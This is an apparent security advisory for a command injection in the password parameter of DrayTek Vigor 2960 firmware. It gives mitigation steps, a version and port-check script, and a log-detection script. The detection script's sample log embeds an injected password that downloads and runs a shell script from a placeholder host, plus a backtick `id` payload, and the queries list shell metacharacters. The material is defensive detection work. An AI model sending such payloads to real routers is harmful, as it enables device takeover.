CVE-2023-1162

7.2 HIGH

📋 TL;DR

CVE-2023-1162 is a command injection vulnerability in DrayTek Vigor 2960 firmware 1.5.1.4 and 1.5.1.5. The password parameter handled by mainfunction.cgi in the web management interface is used in an OS command without sanitisation, so a crafted value runs arbitrary commands on the router. The attack is launched over the network against the management interface, reportedly without authentication, and public exploit code exists. Only products no longer supported by the maintainer are affected, so no vendor fix will be released.

💻 Affected Systems

Products:
  • DrayTek Vigor 2960
Versions: 1.5.1.4, 1.5.1.5
Operating Systems: Embedded router firmware
Default Config Vulnerable: ⚠️ Yes
Notes: Only affects products no longer supported by the vendor; there is no fixed firmware. The web management interface must be reachable from the attacker's network position.

📦 What is this software?

The DrayTek Vigor 2960 is a dual-WAN load-balancing router and VPN gateway sold to small and medium businesses and branch offices. It is administered through a web management interface implemented as CGI scripts; mainfunction.cgi, the script named in this advisory, is part of that interface. The model has reached end of support, which is why no fixed firmware exists.
⚠️ Risk & Real-World Impact

🔴 Worst Case: Complete compromise of the router. The attacker runs commands on the device, intercepts or redirects all traffic passing through it, installs a persistent backdoor, pivots into the internal network, and uses the router as a launch point for further attacks.

🟠 Likely Case: Router takeover leading to traffic monitoring, credential theft and lateral movement into connected systems.

🟢 If Mitigated: Limited impact if the management interface is unreachable from untrusted networks and segmentation keeps the router away from critical systems.

🌐 Internet-Facing: HIGH - The vulnerability is remotely exploitable and public exploits exist for the web interface.
🏢 Internal Only: MEDIUM - Internal attackers or compromised internal systems could exploit this, but requires network access to the management interface.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes (as reported; see the scoring caveat below)
Complexity: LOW

Exploit code is publicly available on GitHub. The injection point is a single request parameter, so exploitation needs no special tooling. One caveat before treating this as a drive-by unauthenticated RCE: a CVSS 3.1 base score of 7.2 together with the full confidentiality, integrity and availability impact described above corresponds to the vector AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H, meaning the scorer assumed an attacker who already holds high privileges on the web interface (the same impact with PR:N scores 9.8). Before raising or lowering priority, confirm against the public PoC whether your firmware build accepts the payload prior to a successful login.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: N/A

Vendor Advisory: N/A

Restart Required: No

Instructions:

No official patch is available: the affected firmware belongs to an end-of-support product, so none will be released. Plan a replacement with a supported model and apply the workarounds below in the meantime.

🔧 Temporary Workarounds

Disable Web Management Interface (applies to: all affected versions)

Disable the web management interface entirely so the vulnerable CGI is never reachable.

Log in to the router CLI over SSH (prefer SSH to Telnet, which sends the admin credentials in clear text) and turn off the web management service; the exact commands vary by firmware build and configuration. This also removes your own browser access, so confirm that CLI access works before you rely on it.

Restrict Management Interface Access (applies to: all affected versions)

Limit access to the web management interface to an allow-list of trusted administrator addresses.

Disable management from the WAN side on the router if your configuration offers it, and on an upstream firewall drop TCP to the router's HTTP/HTTPS management ports from every source not on the allow-list. This reduces exposure without removing the flaw: any host on the allow-list, or any system an attacker compromises on the management LAN, can still exploit it.

🧯 If You Can't Patch

  • Replace affected routers with supported models that receive security updates
  • Implement network segmentation to isolate vulnerable routers from critical systems

🔍 How to Verify

Check if Vulnerable:

Read the firmware version from the web interface under System Maintenance > System Information. A device reporting 1.5.1.4 or 1.5.1.5 is affected. The CLI command 'show version' gives the same information on builds that support it; CLI syntax varies between DrayTek firmware lines, so treat the web page as authoritative.

Check Version:

ssh admin@router_ip 'show version'
(or open the web interface and read the System Information page)

Verify Fix Applied:

No patch exists, so verify the workaround instead: from an address outside the allow-list, confirm that the management ports do not answer at all; from a trusted address, confirm that you are not locked out. Repeat after every firmware or configuration change, since a restore of an old configuration can silently re-expose the interface.
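A small check script for the two verification steps above, added here as an example and not part of this advisory or of any DrayTek tooling. It classifies a pasted System Information or CLI version string against the two affected builds, and tests from the current host whether the management ports complete a TCP handshake; run the port test once from an address outside your allow-list (must fail) and once from inside it (must succeed). The file name in the usage comment and the default ports 80/443 are assumptions; adjust them to the ports your router actually serves management on.

```python
"""Verify CVE-2023-1162 exposure on a DrayTek Vigor 2960.

Added example. Checks a pasted firmware version string and whether the
management ports answer from the host this runs on.
"""
import re
import socket

# Exactly the two builds the advisory lists. The product is end-of-support,
# so there is no 'fixed' version to compare against: anything else is merely
# 'not listed', not known-safe.
AFFECTED_VERSIONS = frozenset({"1.5.1.4", "1.5.1.5"})
# Four dotted numeric groups, not preceded or followed by another digit/dot,
# so 'v1.5.1.4' and 'Firmware Version: 1.5.1.5 (build ...)' both work.
VERSION_RE = re.compile(r"(?<![\d.])(\d+\.\d+\.\d+\.\d+)(?![\d.])")


def firmware_version(text):
    """First a.b.c.d token in text copied from System Information or the CLI,
    or None if there is none."""
    m = VERSION_RE.search(text)
    return m.group(1) if m else None


def version_status(text):
    """'affected', 'not-listed' or 'unknown' for a pasted version string."""
    version = firmware_version(text)
    if version is None:
        return "unknown"
    return "affected" if version in AFFECTED_VERSIONS else "not-listed"


def port_reachable(host, port, timeout=2.0):
    """True if a TCP handshake to host:port completes from this machine."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def workaround_verdict(host, ports=(80, 443), vantage_is_trusted=False):
    """Untrusted vantage: pass only if every management port is closed.
    Trusted vantage: pass only if at least one still answers (not locked out)."""
    open_ports = [p for p in ports if port_reachable(host, p)]
    passed = bool(open_ports) if vantage_is_trusted else not open_ports
    return {"host": host, "open_ports": open_ports,
            "trusted_vantage": vantage_is_trusted, "pass": passed}


if __name__ == "__main__":
    import sys
    # usage (hypothetical file name):
    #   python check_vigor.py <router-ip> <trusted|untrusted> "<pasted System Information text>"
    host, vantage, info = sys.argv[1], sys.argv[2] == "trusted", sys.argv[3]
    print("firmware:", version_status(info))
    print("workaround:", workaround_verdict(host, vantage_is_trusted=vantage))
```

A "not-listed" result is not a clean bill of health: the advisory names the two builds it was reported against, and no later build on this end-of-support model has been published as fixed.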

📡 Detection & Monitoring

Log Indicators:

  • Router syslog entries showing unexpected process or shell activity, if the firmware logs them at all. The device's own logs are unlikely to capture the injected payload, so also collect logs from any proxy, WAF or IDS that sees traffic to the management interface.
  • Bursts of login attempts against mainfunction.cgi whose password value is unusually long or contains shell metacharacters (; | ` $( or their URL-encoded forms %3B %7C %60 %24%28), with or without a successful login afterwards.
  • Configuration changes, new administrator accounts, or altered DNS, routing or VPN settings that no administrator made.

Network Indicators:

  • Outbound connections from the router's own address to unexpected destinations (payload download, reverse shell, command-and-control)
  • Traffic from the router to known malicious IPs
  • Port scans or internal connections originating from the router

SIEM Query:

Splunk-style pseudo-query over proxy or IDS logs of requests to the management interface. Match both raw and URL-encoded metacharacters, since the payload arrives form-encoded:

source="router_logs" "mainfunction.cgi" "password=" (";" OR "|" OR "`" OR "$(" OR "%3B" OR "%7C" OR "%60" OR "%24%28")
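Detection logic for the password-parameter indicator, as an added example that is not part of this advisory or of DrayTek's software. It assumes you record HTTP requests to the management interface at a reverse proxy, TLS-terminating tap or IDS in front of the router (the router's own syslog will not contain request bodies), and it uses a constructed access-log shape with a trailing body= field. The sample lines, client addresses and the /cgi-bin/mainfunction.cgi path are constructed for the example; adapt LINE_RE to whatever your collector actually emits.

```python
"""Flag requests to the Vigor 2960 management CGI whose `password`
parameter carries shell-chaining metacharacters (the CVE-2023-1162 sink).

Added example. Log shape, paths and sample lines are constructed.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Tokens a shell needs to chain or substitute a command. A lone '$', '(' or
# '!' is common in genuine passwords and is deliberately not matched, which
# keeps false positives low at the cost of missing unusual payload shapes.
STRONG_META = re.compile(r";|\|\||\||&&|`|\$\(|\r|\n")

# Assumed (constructed) access-log shape, one request per line:
#   <client-ip> <iso-timestamp> "<METHOD> <path?query> HTTP/1.1" <status> [body=<urlencoded-form>]
LINE_RE = re.compile(
    r'^(?P<src>\S+) (?P<ts>\S+) "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3})(?: body=(?P<body>\S*))?$'
)


def password_values(target, body):
    """Every decoded 'password' value from the query string and the form body."""
    values = []
    for raw in (urlsplit(target).query, body or ""):
        values.extend(parse_qs(raw, keep_blank_values=True).get("password", []))
    return values


def check_line(line):
    """Return a finding for a mainfunction.cgi request whose password holds a
    shell metacharacter, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    target = m.group("target")
    if "mainfunction.cgi" not in urlsplit(target).path:
        return None
    for pw in password_values(target, m.group("body")):
        hit = STRONG_META.search(pw)
        if hit:
            return {
                "src": m.group("src"),
                "ts": m.group("ts"),
                "token": hit.group(0),
                "password": pw,
            }
    return None


def scan(lines):
    """Findings for every suspicious line, in input order."""
    return [f for f in map(check_line, lines) if f is not None]


# Constructed sample traffic: one legitimate login (password contains '$'),
# one status poll, two injection attempts (POST body and GET query), and one
# metacharacter hit on an unrelated CGI that must not fire.
SAMPLE_LOG = [
    '192.0.2.10 2023-03-03T10:00:01Z "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 200 '
    'body=action=login&user=admin&password=Correct-Horse%24Battery',
    '192.0.2.10 2023-03-03T10:00:05Z "GET /cgi-bin/mainfunction.cgi?action=status HTTP/1.1" 200',
    '203.0.113.77 2023-03-03T10:02:13Z "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 200 '
    'body=action=login&user=admin&password=x%3Bwget+http%3A%2F%2F203.0.113.77%2Fa.sh+-O+%2Ftmp%2Fa.sh%3Bsh+%2Ftmp%2Fa.sh',
    '203.0.113.77 2023-03-03T10:02:40Z "GET /cgi-bin/mainfunction.cgi?action=login&user=admin&password=%60id%60 HTTP/1.1" 200',
    '198.51.100.4 2023-03-03T10:03:00Z "POST /cgi-bin/other.cgi HTTP/1.1" 200 body=password=a%3Bb',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['ts']} {f['src']} token={f['token']!r} password={f['password']!r}")
```

Decoding before matching matters: the payload arrives URL-encoded, so a raw substring search for ';' on the log line misses %3B, while matching on the decoded value catches both spellings with one pattern. Matching only chaining tokens rather than every punctuation character is what keeps a genuine password such as the first sample line from firing.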
